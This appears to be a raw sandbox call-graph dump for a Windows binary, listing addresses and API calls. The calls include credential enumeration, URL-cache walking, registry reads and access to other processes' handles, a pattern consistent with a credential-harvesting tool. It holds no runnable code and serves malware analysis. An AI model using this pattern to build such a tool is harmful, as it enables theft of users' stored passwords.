37849->37847 38004 410c46 10 API calls 37849->38004 37853 411167 37850->37853 37851 4111af 37853->37851 37854 4111a6 qsort 37853->37854 37854->37851 37857->37667 37859 40eb10 37858->37859 37872 40e8e0 37859->37872 37862 40eb6c memcpy memcpy 37863 40ebe1 37862->37863 37864 40ebb7 37862->37864 37863->37862 37865 40ebf2 ??2@YAPAXI ??2@YAPAXI 37863->37865 37864->37863 37869 40d134 16 API calls 37864->37869 37866 40ec2e ??2@YAPAXI 37865->37866 37868 40ec65 37865->37868 37866->37868 37882 40ea7f 37868->37882 37869->37864 37871 402f49 37871->37667 37873 40e8f2 37872->37873 37874 40e8eb ??3@YAXPAX 37872->37874 37875 40e900 37873->37875 37876 40e8f9 ??3@YAXPAX 37873->37876 37874->37873 37877 40e911 37875->37877 37878 40e90a ??3@YAXPAX 37875->37878 37876->37875 37879 40e931 ??2@YAPAXI ??2@YAPAXI 37877->37879 37880 40e921 ??3@YAXPAX 37877->37880 37881 40e92a ??3@YAXPAX 37877->37881 37878->37877 37879->37862 37880->37881 37881->37879 37883 40aa04 free 37882->37883 37884 40ea88 37883->37884 37885 40aa04 free 37884->37885 37886 40ea90 37885->37886 37887 40aa04 free 37886->37887 37888 40ea98 37887->37888 37889 40aa04 free 37888->37889 37890 40eaa0 37889->37890 37891 40a9ce 4 API calls 37890->37891 37892 40eab3 37891->37892 37893 40a9ce 4 API calls 37892->37893 37894 40eabd 37893->37894 37895 40a9ce 4 API calls 37894->37895 37896 40eac7 37895->37896 37897 40a9ce 4 API calls 37896->37897 37898 40ead1 37897->37898 37898->37871 37899->37830 37900->37834 37958 40b2cc 37901->37958 37903 402b0a 37904 40b2cc 27 API calls 37903->37904 37905 402b23 37904->37905 37906 40b2cc 27 API calls 37905->37906 37907 402b3a 37906->37907 37908 40b2cc 27 API calls 37907->37908 37909 402b54 37908->37909 37910 40b2cc 27 API calls 37909->37910 37911 402b6b 37910->37911 37912 40b2cc 27 API calls 37911->37912 37913 402b82 37912->37913 37914 40b2cc 27 API calls 37913->37914 37915 402b99 37914->37915 37916 40b2cc 27 API calls 37915->37916 37917 402bb0 37916->37917 37918 40b2cc 27 API calls 37917->37918 37919 402bc7 37918->37919 37920 40b2cc 27 API calls 37919->37920 37921 402bde 37920->37921 37922 40b2cc 27 API calls 37921->37922 37923 402bf5 37922->37923 37924 40b2cc 27 API calls 37923->37924 37925 402c0c 37924->37925 37926 40b2cc 27 API calls 37925->37926 37927 402c23 37926->37927 37928 40b2cc 27 API calls 37927->37928 37929 402c3a 37928->37929 37930 40b2cc 27 API calls 37929->37930 37931 402c51 37930->37931 37932 40b2cc 27 API calls 37931->37932 37933 402c68 37932->37933 37934 40b2cc 27 API calls 37933->37934 37935 402c7f 37934->37935 37936 40b2cc 27 API calls 37935->37936 37937 402c99 37936->37937 37938 40b2cc 27 API calls 37937->37938 37939 402cb3 37938->37939 37940 40b2cc 27 API calls 37939->37940 37941 402cd5 37940->37941 37942 40b2cc 27 API calls 37941->37942 37943 402cf0 37942->37943 37944 40b2cc 27 API calls 37943->37944 37945 402d0b 37944->37945 37946 40b2cc 27 API calls 37945->37946 37947 402d26 37946->37947 37948 40b2cc 27 API calls 37947->37948 37949 402d3e 37948->37949 37950 40b2cc 27 API calls 37949->37950 37951 402d59 37950->37951 37952 40b2cc 27 API calls 37951->37952 37953 402d78 37952->37953 37954 40b2cc 27 API calls 37953->37954 37955 402d93 37954->37955 37956 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 37955->37956 37956->37838 37957->37828 37961 40b58d 37958->37961 37960 40b2d1 37960->37903 37962 40b5a4 GetModuleHandleW FindResourceW 37961->37962 37963 40b62e 37961->37963 37964 40b5c2 LoadResource 37962->37964 37966 40b5e7 37962->37966 37963->37960 37965 40b5d0 SizeofResource LockResource 37964->37965 37964->37966 37965->37966 37966->37963 37974 40afcf 37966->37974 37968 40b608 memcpy 37977 40b4d3 memcpy 37968->37977 37970 40b61e 37978 40b3c1 18 API calls 37970->37978 37972 40b626 37979 40b04b 37972->37979 37975 40b04b ??3@YAXPAX 37974->37975 37976 40afd7 ??2@YAPAXI 37975->37976 37976->37968 37977->37970 37978->37972 37980 40b051 ??3@YAXPAX 37979->37980 37981 40b05f 37979->37981 37980->37981 37981->37963 37982->37846 37984 444a64 FreeLibrary 37983->37984 37985 444a83 37983->37985 37984->37985 37985->37848 37987 4032c4 37986->37987 37988 40b633 free 37987->37988 37989 403316 37988->37989 38005 44553b 37989->38005 37993 403480 38203 40368c 15 API calls 37993->38203 37995 403489 37996 40b633 free 37995->37996 37997 403495 37996->37997 37997->37848 37998 4033a9 memset memcpy 37999 4033ec wcscmp 37998->37999 38000 40333c 37998->38000 37999->38000 38000->37993 38000->37998 38000->37999 38201 4028e7 11 API calls 38000->38201 38202 40f508 6 API calls 38000->38202 38002 403421 _wcsicmp 38002->38000 38004->37849 38006 445548 38005->38006 38007 445599 38006->38007 38204 40c768 38006->38204 38008 4455a8 memset 38007->38008 38020 4457f2 38007->38020 38287 403988 38008->38287 38015 4458aa 38017 44594a 38015->38017 38018 4458bb memset memset 38015->38018 38016 445672 38298 403fbe memset memset memset memset memset 38016->38298 38021 4459ed 38017->38021 38022 44595e memset memset 38017->38022 38024 414c2e 14 API calls 38018->38024 38026 445854 38020->38026 38389 403e2d memset memset memset memset memset 38020->38389 38032 445a00 memset memset 38021->38032 38033 445b22 38021->38033 38028 414c2e 14 API calls 38022->38028 38023 4455e5 38023->38016 38037 44560f 38023->38037 38029 4458f9 38024->38029 38025 44557a 38030 44558c 38025->38030 38482 4136c0 CoTaskMemFree 38025->38482 38026->38015 38412 403c9c memset memset memset memset memset 38026->38412 38035 44599c 38028->38035 38036 40b2cc 27 API calls 38029->38036 38271 444b06 38030->38271 38435 414c2e 38032->38435 38040 445bca 38033->38040 38041 445b38 memset memset memset 38033->38041 38046 40b2cc 27 API calls 38035->38046 38047 445909 38036->38047 38049 4087b3 337 API calls 38037->38049 38039 445849 38498 40b1ab free free 38039->38498 38048 445c8b memset memset 38040->38048 38104 445cf0 38040->38104 38052 445bd4 38041->38052 38053 445b98 38041->38053 38054 4459ac 38046->38054 38063 409d1f 6 API calls 38047->38063 38055 414c2e 14 API calls 38048->38055 38064 445621 38049->38064 38050 445585 38483 41366b FreeLibrary 38050->38483 38051 44589f 38499 40b1ab free free 38051->38499 38061 414c2e 14 API calls 38052->38061 38053->38052 38057 445ba2 38053->38057 38066 409d1f 6 API calls 38054->38066 38067 445cc9 38055->38067 38569 4099c6 wcslen 38057->38569 38058 4456b2 38486 40b1ab free free 38058->38486 38059 40b2cc 27 API calls 38070 445a4f 38059->38070 38072 445be2 38061->38072 38062 403335 38200 4452e5 45 API calls 38062->38200 38075 445919 38063->38075 38484 4454bf 20 API calls 38064->38484 38065 445823 38065->38039 38084 4087b3 337 API calls 38065->38084 38077 4459bc 38066->38077 38078 409d1f 6 API calls 38067->38078 38068 445879 38068->38051 38088 4087b3 337 API calls 38068->38088 38448 409d1f wcslen wcslen 38070->38448 38082 40b2cc 27 API calls 38072->38082 38073 445d3d 38101 40b2cc 27 API calls 38073->38101 38074 445d88 memset memset memset 38076 414c2e 14 API calls 38074->38076 38500 409b98 GetFileAttributesW 38075->38500 38085 445dde 38076->38085 38565 409b98 GetFileAttributesW 38077->38565 38087 445ce1 38078->38087 38079 445bb3 38572 445403 memset 38079->38572 38080 445680 38080->38058 38321 4087b3 memset 38080->38321 38091 445bf3 38082->38091 38084->38065 38094 40b2cc 27 API calls 38085->38094 38589 409b98 GetFileAttributesW 38087->38589 38088->38068 38100 409d1f 6 API calls 38091->38100 38092 445928 38092->38017 38501 40b6ef 38092->38501 38103 445def 38094->38103 38095 4459cb 38095->38021 38113 40b6ef 249 API calls 38095->38113 38099 40b2cc 27 API calls 38106 445a94 38099->38106 38108 445c07 38100->38108 38109 445d54 _wcsicmp 38101->38109 38102 445665 38485 40b1ab free free 38102->38485 38111 409d1f 6 API calls 38103->38111 38104->38062 38104->38073 38104->38074 38105 445389 255 API calls 38105->38040 38453 40ae18 38106->38453 38107 44566d 38107->38020 38372 413d4c 38107->38372 38116 445389 255 API calls 38108->38116 38117 445d71 38109->38117 38178 445d67 38109->38178 38119 445e03 38111->38119 38113->38021 38121 445c17 38116->38121 38590 445093 23 API calls 38117->38590 38118 44563c 38118->38102 38123 4087b3 337 API calls 38118->38123 38591 409b98 GetFileAttributesW 38119->38591 38120 4456d8 38126 40b2cc 27 API calls 38120->38126 38127 40b2cc 27 API calls 38121->38127 38123->38118 38125 40b6ef 249 API calls 38125->38062 38131 4456e2 38126->38131 38132 445c23 38127->38132 38128 445d83 38128->38062 38130 445e12 38136 445e6b 38130->38136 38141 40b2cc 27 API calls 38130->38141 38487 413fa6 _wcsicmp _wcsicmp 38131->38487 38134 409d1f 6 API calls 38132->38134 38138 445c37 38134->38138 38135 445b17 38566 40aebe 38135->38566 38593 445093 23 API calls 38136->38593 38137 4456eb 38144 4456fd memset memset memset memset 38137->38144 38145 4457ea 38137->38145 38139 445389 255 API calls 38138->38139 38147 445c47 38139->38147 38148 445e33 38141->38148 38488 409c70 wcscpy wcsrchr 38144->38488 38491 413d29 38145->38491 38152 40b2cc 27 API calls 38147->38152 38153 409d1f 6 API calls 38148->38153 38150 445e7e 38154 445f67 38150->38154 38157 445c53 38152->38157 38158 445e47 38153->38158 38159 40b2cc 27 API calls 38154->38159 38155 445ab2 memset 38160 40b2cc 27 API calls 38155->38160 38156 409c70 2 API calls 38161 44577e 38156->38161 38162 409d1f 6 API calls 38157->38162 38592 409b98 GetFileAttributesW 38158->38592 38164 445f73 38159->38164 38165 445aa1 38160->38165 38167 409c70 2 API calls 38161->38167 38168 445c67 38162->38168 38170 409d1f 6 API calls 38164->38170 38165->38135 38165->38155 38166 409d1f 6 API calls 38165->38166 38460 40add4 38165->38460 38465 445389 38165->38465 38474 40ae51 38165->38474 38166->38165 38171 44578d 38167->38171 38172 445389 255 API calls 38168->38172 38169 445e56 38169->38136 38175 445e83 memset 38169->38175 38173 445f87 38170->38173 38171->38145 38177 40b2cc 27 API calls 38171->38177 38172->38040 38596 409b98 GetFileAttributesW 38173->38596 38179 40b2cc 27 API calls 38175->38179 38180 4457a8 38177->38180 38178->38062 38178->38125 38181 445eab 38179->38181 38182 409d1f 6 API calls 38180->38182 38183 409d1f 6 API calls 38181->38183 38184 4457b8 38182->38184 38185 445ebf 38183->38185 38490 409b98 GetFileAttributesW 38184->38490 38187 40ae18 9 API calls 38185->38187 38195 445ef5 38187->38195 38188 4457c7 38188->38145 38190 4087b3 337 API calls 38188->38190 38189 40ae51 9 API calls 38189->38195 38190->38145 38191 445f5c 38192 40aebe FindClose 38191->38192 38192->38154 38193 40add4 2 API calls 38193->38195 38194 40b2cc 27 API calls 38194->38195 38195->38189 38195->38191 38195->38193 38195->38194 38196 409d1f 6 API calls 38195->38196 38198 445f3a 38195->38198 38594 409b98 GetFileAttributesW 38195->38594 38196->38195 38595 445093 23 API calls 38198->38595 38200->38000 38201->38002 38202->38000 38203->37995 38205 40c775 38204->38205 38597 40b1ab free free 38205->38597 38207 40c788 38598 40b1ab free free 38207->38598 38209 40c790 38599 40b1ab free free 38209->38599 38211 40c798 38212 40aa04 free 38211->38212 38213 40c7a0 38212->38213 38600 40c274 memset 38213->38600 38218 40a8ab 9 API calls 38219 40c7c3 38218->38219 38220 40a8ab 9 API calls 38219->38220 38221 40c7d0 38220->38221 38629 40c3c3 38221->38629 38225 40c877 38234 40bdb0 38225->38234 38226 40c86c 38655 4053fe 39 API calls 38226->38655 38229 40c813 _wcslwr 38653 40c634 49 API calls 38229->38653 38231 40c829 wcslen 38232 40c7e5 38231->38232 38232->38225 38232->38226 38652 40a706 wcslen memcpy 38232->38652 38654 40c634 49 API calls 38232->38654 38840 404363 38234->38840 38237 40bf5d 38860 40440c 38237->38860 38238 40bdee 38238->38237 38242 40b2cc 27 API calls 38238->38242 38239 40bddf CredEnumerateW 38239->38238 38243 40be02 wcslen 38242->38243 38243->38237 38250 40be1e 38243->38250 38244 40be26 wcsncmp 38244->38250 38247 40be7d memset 38248 40bea7 memcpy 38247->38248 38247->38250 38249 40bf11 wcschr 38248->38249 38248->38250 38249->38250 38250->38237 38250->38244 38250->38247 38250->38248 38250->38249 38251 40b2cc 27 API calls 38250->38251 38253 40bf43 LocalFree 38250->38253 38863 40bd5d 28 API calls 38250->38863 38864 404423 38250->38864 38252 40bef6 _wcsnicmp 38251->38252 38252->38249 38252->38250 38253->38250 38254 4135f7 38877 4135e0 38254->38877 38257 40b2cc 27 API calls 38258 41360d 38257->38258 38259 40a804 8 API calls 38258->38259 38260 413613 38259->38260 38261 41361b 38260->38261 38262 41363e 38260->38262 38263 40b273 27 API calls 38261->38263 38264 4135e0 FreeLibrary 38262->38264 38266 413625 GetProcAddress 38263->38266 38265 413643 38264->38265 38265->38025 38266->38262 38267 413648 38266->38267 38268 413658 38267->38268 38269 4135e0 FreeLibrary 38267->38269 38268->38025 38270 413666 38269->38270 38270->38025 38880 4449b9 38271->38880 38274 4449b9 42 API calls 38276 444b4b 38274->38276 38275 444c15 38278 4449b9 42 API calls 38275->38278 38276->38275 38901 444972 GetVersionExW 38276->38901 38279 444c1f 38278->38279 38279->38007 38280 444b99 memcmp 38285 444b8c 38280->38285 38281 444c0b 38905 444a85 42 API calls 38281->38905 38285->38280 38285->38281 38902 444aa5 42 API calls 38285->38902 38903 40a7a0 GetVersionExW 38285->38903 38904 444a85 42 API calls 38285->38904 38288 40399d 38287->38288 38906 403a16 38288->38906 38290 403a09 38920 40b1ab free free 38290->38920 38292 403a12 wcsrchr 38292->38023 38293 4039a3 38293->38290 38296 4039f4 38293->38296 38917 40a02c CreateFileW 38293->38917 38296->38290 38297 4099c6 2 API calls 38296->38297 38297->38290 38299 414c2e 14 API calls 38298->38299 38300 404048 38299->38300 38301 414c2e 14 API calls 38300->38301 38302 404056 38301->38302 38303 409d1f 6 API calls 38302->38303 38304 404073 38303->38304 38305 409d1f 6 API calls 38304->38305 38306 40408e 38305->38306 38307 409d1f 6 API calls 38306->38307 38308 4040a6 38307->38308 38309 403af5 20 API calls 38308->38309 38310 4040ba 38309->38310 38311 403af5 20 API calls 38310->38311 38312 4040cb 38311->38312 38947 40414f memset 38312->38947 38314 404140 38961 40b1ab free free 38314->38961 38316 4040ec memset 38319 4040e0 38316->38319 38317 404148 38317->38080 38318 4099c6 2 API calls 38318->38319 38319->38314 38319->38316 38319->38318 38320 40a8ab 9 API calls 38319->38320 38320->38319 38974 40a6e6 WideCharToMultiByte 38321->38974 38323 4087ed 38975 4095d9 memset 38323->38975 38326 408809 memset memset memset memset memset 38327 40b2cc 27 API calls 38326->38327 38328 4088a1 38327->38328 38329 409d1f 6 API calls 38328->38329 38330 4088b1 38329->38330 38331 40b2cc 27 API calls 38330->38331 38332 4088c0 38331->38332 38333 409d1f 6 API calls 38332->38333 38334 4088d0 38333->38334 38335 40b2cc 27 API calls 38334->38335 38336 4088df 38335->38336 38337 409d1f 6 API calls 38336->38337 38338 4088ef 38337->38338 38339 40b2cc 27 API calls 38338->38339 38340 4088fe 38339->38340 38341 409d1f 6 API calls 38340->38341 38342 40890e 38341->38342 38343 40b2cc 27 API calls 38342->38343 38344 40891d 38343->38344 38345 409d1f 6 API calls 38344->38345 38346 40892d 38345->38346 38994 409b98 GetFileAttributesW 38346->38994 38348 40893e 38349 408943 38348->38349 38350 408958 38348->38350 38995 407fdf 75 API calls 38349->38995 38996 409b98 GetFileAttributesW 38350->38996 38353 408953 38353->38080 38354 408964 38355 408969 38354->38355 38356 40897b 38354->38356 38997 4082c7 198 API calls 38355->38997 38998 409b98 GetFileAttributesW 38356->38998 38359 408987 38360 4089a1 38359->38360 38361 40898c 38359->38361 39000 409b98 GetFileAttributesW 38360->39000 38999 408560 29 API calls 38361->38999 38373 40b633 free 38372->38373 38374 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38373->38374 38375 413f00 Process32NextW 38374->38375 38376 413da5 OpenProcess 38375->38376 38377 413f17 CloseHandle 38375->38377 38378 413df3 memset 38376->38378 38383 413eb0 38376->38383 38377->38120 39264 413f27 38378->39264 38380 413ebf free 38380->38383 38381 4099f4 3 API calls 38381->38383 38382 413e1f 38384 413e37 GetModuleHandleW 38382->38384 39269 413959 38382->39269 39285 413ca4 38382->39285 38383->38375 38383->38380 38383->38381 38384->38382 38386 413e46 GetProcAddress 38384->38386 38386->38382 38388 413ea2 CloseHandle 38388->38383 38390 414c2e 14 API calls 38389->38390 38391 403eb7 38390->38391 38392 414c2e 14 API calls 38391->38392 38393 403ec5 38392->38393 38394 409d1f 6 API calls 38393->38394 38395 403ee2 38394->38395 38396 409d1f 6 API calls 38395->38396 38397 403efd 38396->38397 38398 409d1f 6 API calls 38397->38398 38399 403f15 38398->38399 38400 403af5 20 API calls 38399->38400 38401 403f29 38400->38401 38402 403af5 20 API calls 38401->38402 38403 403f3a 38402->38403 38404 40414f 33 API calls 38403->38404 38410 403f4f 38404->38410 38405 403faf 39299 40b1ab free free 38405->39299 38407 403f5b memset 38407->38410 38408 403fb7 38408->38065 38409 4099c6 2 API calls 38409->38410 38410->38405 38410->38407 38410->38409 38411 40a8ab 9 API calls 38410->38411 38411->38410 38413 414c2e 14 API calls 38412->38413 38414 403d26 38413->38414 38415 414c2e 14 API calls 38414->38415 38416 403d34 38415->38416 38417 409d1f 6 API calls 38416->38417 38418 403d51 38417->38418 38419 409d1f 6 API calls 38418->38419 38420 403d6c 38419->38420 38421 409d1f 6 API calls 38420->38421 38422 403d84 38421->38422 38423 403af5 20 API calls 38422->38423 38424 403d98 38423->38424 38425 403af5 20 API calls 38424->38425 38426 403da9 38425->38426 38427 40414f 33 API calls 38426->38427 38432 403dbe 38427->38432 38428 403e1e 39300 40b1ab free free 38428->39300 38429 403dca memset 38429->38432 38431 403e26 38431->38068 38432->38428 38432->38429 38433 4099c6 2 API calls 38432->38433 38434 40a8ab 9 API calls 38432->38434 38433->38432 38434->38432 38436 414b81 9 API calls 38435->38436 38438 414c40 38436->38438 38437 414c73 memset 38442 414c94 38437->38442 38438->38437 39301 409cea 38438->39301 38441 414c64 38441->38059 38443 414cf4 wcscpy 38442->38443 39304 414bb0 wcscpy 38442->39304 38443->38441 38445 414cd2 39305 4145ac RegQueryValueExW 38445->39305 38447 414ce9 38447->38443 38449 409d62 38448->38449 38450 409d43 wcscpy 38448->38450 38449->38099 38451 409719 2 API calls 38450->38451 38452 409d51 wcscat 38451->38452 38452->38449 38454 40aebe FindClose 38453->38454 38455 40ae21 38454->38455 38456 4099c6 2 API calls 38455->38456 38457 40ae35 38456->38457 38458 409d1f 6 API calls 38457->38458 38459 40ae49 38458->38459 38459->38165 38461 40ade0 38460->38461 38462 40ae0f 38460->38462 38461->38462 38463 40ade7 wcscmp 38461->38463 38462->38165 38463->38462 38464 40adfe wcscmp 38463->38464 38464->38462 38466 40ae18 9 API calls 38465->38466 38472 4453c4 38466->38472 38467 40ae51 9 API calls 38467->38472 38468 4453f3 38470 40aebe FindClose 38468->38470 38469 40add4 2 API calls 38469->38472 38471 4453fe 38470->38471 38471->38165 38472->38467 38472->38468 38472->38469 38473 445403 250 API calls 38472->38473 38473->38472 38475 40ae7b FindNextFileW 38474->38475 38476 40ae5c FindFirstFileW 38474->38476 38477 40ae94 38475->38477 38478 40ae8f 38475->38478 38476->38477 38480 40aeb6 38477->38480 38481 409d1f 6 API calls 38477->38481 38479 40aebe FindClose 38478->38479 38479->38477 38480->38165 38481->38480 38482->38050 38483->38030 38484->38118 38485->38107 38486->38107 38487->38137 38489 409c89 38488->38489 38489->38156 38490->38188 38492 413d39 38491->38492 38493 413d2f FreeLibrary 38491->38493 38494 40b633 free 38492->38494 38493->38492 38495 413d42 38494->38495 38496 40b633 free 38495->38496 38497 413d4a 38496->38497 38497->38020 38498->38026 38499->38015 38500->38092 38502 44db70 38501->38502 38503 40b6fc memset 38502->38503 38504 409c70 2 API calls 38503->38504 38505 40b732 wcsrchr 38504->38505 38506 40b743 38505->38506 38507 40b746 memset 38505->38507 38506->38507 38508 40b2cc 27 API calls 38507->38508 38509 40b76f 38508->38509 38510 409d1f 6 API calls 38509->38510 38511 40b783 38510->38511 39306 409b98 GetFileAttributesW 38511->39306 38513 40b792 38514 40b7c2 38513->38514 38515 409c70 2 API calls 38513->38515 39307 40bb98 38514->39307 38517 40b7a5 38515->38517 38519 40b2cc 27 API calls 38517->38519 38523 40b7b2 38519->38523 38520 40b837 CloseHandle 38522 40b83e memset 38520->38522 38521 40b817 39341 409a45 GetTempPathW 38521->39341 39340 40a6e6 WideCharToMultiByte 38522->39340 38526 409d1f 6 API calls 38523->38526 38526->38514 38527 40b827 38527->38522 38528 40b866 38529 444432 120 API calls 38528->38529 38530 40b879 38529->38530 38531 40bad5 38530->38531 38532 40b273 27 API calls 38530->38532 38534 40b04b ??3@YAXPAX 38531->38534 38533 40b89a 38532->38533 38535 438552 133 API calls 38533->38535 38536 40baf3 38534->38536 38537 40b8a4 38535->38537 38536->38017 38538 40bacd 38537->38538 38540 4251c4 136 API calls 38537->38540 38539 443d90 110 API calls 38538->38539 38539->38531 38562 40b8b8 38540->38562 38541 40bac6 39353 424f26 122 API calls 38541->39353 38542 40b8bd memset 39344 425413 17 API calls 38542->39344 38545 425413 17 API calls 38545->38562 38548 40a71b MultiByteToWideChar 38548->38562 38551 40b9b5 memcmp 38551->38562 38552 4099c6 2 API calls 38552->38562 38553 404423 37 API calls 38553->38562 38555 4251c4 136 API calls 38555->38562 38556 40bb3e memset memcpy 39354 40a734 MultiByteToWideChar 38556->39354 38559 40bb88 LocalFree 38559->38562 38562->38541 38562->38542 38562->38545 38562->38548 38562->38551 38562->38552 38562->38553 38562->38555 38562->38556 38563 40ba5f memcmp 38562->38563 38564 40a734 MultiByteToWideChar 38562->38564 39345 4253ef 16 API calls 38562->39345 39346 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38562->39346 39347 4253af 17 API calls 38562->39347 39348 4253cf 17 API calls 38562->39348 39349 447280 memset 38562->39349 39350 447960 memset memcpy memcpy memcpy 38562->39350 39351 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38562->39351 39352 447920 memcpy memcpy memcpy 38562->39352 38563->38562 38564->38562 38565->38095 38567 40aed1 38566->38567 38568 40aec7 FindClose 38566->38568 38567->38033 38568->38567 38570 4099d7 38569->38570 38571 4099da memcpy 38569->38571 38570->38571 38571->38079 38573 40b2cc 27 API calls 38572->38573 38574 44543f 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 44544f 38575->38576 39443 409b98 GetFileAttributesW 38576->39443 38578 44545e 38579 445476 38578->38579 38580 40b6ef 249 API calls 38578->38580 38581 40b2cc 27 API calls 38579->38581 38580->38579 38582 445482 38581->38582 38583 409d1f 6 API calls 38582->38583 38584 445492 38583->38584 39444 409b98 GetFileAttributesW 38584->39444 38586 4454a1 38587 4454b9 38586->38587 38588 40b6ef 249 API calls 38586->38588 38587->38105 38588->38587 38589->38104 38590->38128 38591->38130 38592->38169 38593->38150 38594->38195 38595->38195 38596->38178 38597->38207 38598->38209 38599->38211 38601 414c2e 14 API calls 38600->38601 38602 40c2ae 38601->38602 38656 40c1d3 38602->38656 38607 40c3be 38624 40a8ab 38607->38624 38608 40afcf 2 API calls 38609 40c2fd FindFirstUrlCacheEntryW 38608->38609 38610 40c3b6 38609->38610 38611 40c31e wcschr 38609->38611 38612 40b04b ??3@YAXPAX 38610->38612 38613 40c331 38611->38613 38614 40c35e FindNextUrlCacheEntryW 38611->38614 38612->38607 38616 40a8ab 9 API calls 38613->38616 38614->38611 38615 40c373 GetLastError 38614->38615 38617 40c3ad FindCloseUrlCache 38615->38617 38618 40c37e 38615->38618 38619 40c33e wcschr 38616->38619 38617->38610 38620 40afcf 2 API calls 38618->38620 38619->38614 38621 40c34f 38619->38621 38623 40c391 FindNextUrlCacheEntryW 38620->38623 38622 40a8ab 9 API calls 38621->38622 38622->38614 38623->38611 38623->38617 38772 40a97a 38624->38772 38627 40a8cc 38627->38218 38778 40b1ab free free 38629->38778 38631 40c3dd 38632 40b2cc 27 API calls 38631->38632 38633 40c3e7 38632->38633 38634 40c50e 38633->38634 38635 40c3ff 38633->38635 38649 405337 38634->38649 38636 40a9ce 4 API calls 38635->38636 38637 40c418 memset 38636->38637 38779 40aa1d 38637->38779 38640 40c471 38642 40c47a _wcsupr 38640->38642 38641 40c505 38641->38634 38781 40a8d0 7 API calls 38642->38781 38644 40c498 38782 40a8d0 7 API calls 38644->38782 38646 40c4ac memset 38647 40aa1d 38646->38647 38648 40c4e4 RegEnumValueW 38647->38648 38648->38641 38648->38642 38783 405220 38649->38783 38652->38229 38653->38231 38654->38232 38655->38225 38657 40ae18 9 API calls 38656->38657 38663 40c210 38657->38663 38658 40ae51 9 API calls 38658->38663 38659 40c264 38660 40aebe FindClose 38659->38660 38662 40c26f 38660->38662 38661 40add4 2 API calls 38661->38663 38668 40e5ed memset memset 38662->38668 38663->38658 38663->38659 38663->38661 38664 40c231 _wcsicmp 38663->38664 38666 40c1d3 34 API calls 38663->38666 38664->38663 38665 40c248 38664->38665 38681 40c084 21 API calls 38665->38681 38666->38663 38669 414c2e 14 API calls 38668->38669 38670 40e63f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40e658 38671->38672 38682 409b98 GetFileAttributesW 38672->38682 38674 40e667 38675 409d1f 6 API calls 38674->38675 38677 40e680 38674->38677 38675->38677 38683 409b98 GetFileAttributesW 38677->38683 38678 40e68f 38679 40c2d8 38678->38679 38684 40e4b2 38678->38684 38679->38607 38679->38608 38681->38663 38682->38674 38683->38678 38705 40e01e 38684->38705 38686 40e593 38688 40e5b0 38686->38688 38689 40e59c DeleteFileW 38686->38689 38687 40e521 38687->38686 38728 40e175 38687->38728 38690 40b04b ??3@YAXPAX 38688->38690 38689->38688 38691 40e5bb 38690->38691 38693 40e5c4 CloseHandle 38691->38693 38694 40e5cc 38691->38694 38693->38694 38696 40b633 free 38694->38696 38695 40e573 38697 40e584 38695->38697 38698 40e57c CloseHandle 38695->38698 38699 40e5db 38696->38699 38771 40b1ab free free 38697->38771 38698->38697 38702 40b633 free 38699->38702 38701 40e540 38701->38695 38748 40e2ab 38701->38748 38703 40e5e3 38702->38703 38703->38679 38706 406214 22 API calls 38705->38706 38707 40e03c 38706->38707 38708 40e16b 38707->38708 38709 40dd85 74 API calls 38707->38709 38708->38687 38710 40e06b 38709->38710 38710->38708 38711 40afcf ??2@YAPAXI ??3@YAXPAX 38710->38711 38712 40e08d OpenProcess 38711->38712 38713 40e0a4 GetCurrentProcess DuplicateHandle 38712->38713 38717 40e152 38712->38717 38714 40e0d0 GetFileSize 38713->38714 38715 40e14a CloseHandle 38713->38715 38718 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38714->38718 38715->38717 38716 40e160 38720 40b04b ??3@YAXPAX 38716->38720 38717->38716 38719 406214 22 API calls 38717->38719 38721 40e0ea 38718->38721 38719->38716 38720->38708 38722 4096dc CreateFileW 38721->38722 38723 40e0f1 CreateFileMappingW 38722->38723 38724 40e140 CloseHandle CloseHandle 38723->38724 38725 40e10b MapViewOfFile 38723->38725 38724->38715 38726 40e13b CloseHandle 38725->38726 38727 40e11f WriteFile UnmapViewOfFile 38725->38727 38726->38724 38727->38726 38729 40e18c 38728->38729 38730 406b90 11 API calls 38729->38730 38731 40e19f 38730->38731 38732 40e1a7 memset 38731->38732 38733 40e299 38731->38733 38738 40e1e8 38732->38738 38734 4069a3 ??3@YAXPAX free 38733->38734 38735 40e2a4 38734->38735 38735->38701 38736 406e8f 13 API calls 38736->38738 38737 406b53 SetFilePointerEx ReadFile 38737->38738 38738->38736 38738->38737 38739 40e283 38738->38739 38740 40dd50 _wcsicmp 38738->38740 38744 40742e 8 API calls 38738->38744 38745 40aae3 wcslen wcslen _memicmp 38738->38745 38746 40e244 _snwprintf 38738->38746 38741 40e291 38739->38741 38742 40e288 free 38739->38742 38740->38738 38743 40aa04 free 38741->38743 38742->38741 38743->38733 38744->38738 38745->38738 38747 40a8d0 7 API calls 38746->38747 38747->38738 38749 40e2c2 38748->38749 38750 406b90 11 API calls 38749->38750 38766 40e2d3 38750->38766 38751 40e4a0 38752 4069a3 ??3@YAXPAX free 38751->38752 38754 40e4ab 38752->38754 38753 406e8f 13 API calls 38753->38766 38754->38701 38755 406b53 SetFilePointerEx ReadFile 38755->38766 38756 40e489 38757 40aa04 free 38756->38757 38758 40e491 38757->38758 38758->38751 38759 40e497 free 38758->38759 38759->38751 38760 40dd50 _wcsicmp 38760->38766 38761 40dd50 _wcsicmp 38762 40e376 memset 38761->38762 38763 40aa29 6 API calls 38762->38763 38763->38766 38764 40742e 8 API calls 38764->38766 38765 40e3e0 memcpy 38765->38766 38766->38751 38766->38753 38766->38755 38766->38756 38766->38760 38766->38761 38766->38764 38766->38765 38767 40e3b3 wcschr 38766->38767 38768 40e3fb memcpy 38766->38768 38769 40e416 memcpy 38766->38769 38770 40e431 memcpy 38766->38770 38767->38766 38768->38766 38769->38766 38770->38766 38771->38686 38776 40a980 38772->38776 38773 40a8bb 38773->38627 38777 40a8d0 7 API calls 38773->38777 38774 40a995 _wcsicmp 38774->38776 38775 40a99c wcscmp 38775->38776 38776->38773 38776->38774 38776->38775 38777->38627 38778->38631 38780 40aa23 RegEnumValueW 38779->38780 38780->38640 38780->38641 38781->38644 38782->38646 38784 405335 38783->38784 38785 40522a 38783->38785 38784->38232 38786 40b2cc 27 API calls 38785->38786 38787 405234 38786->38787 38788 40a804 8 API calls 38787->38788 38789 40523a 38788->38789 38828 40b273 38789->38828 38791 405248 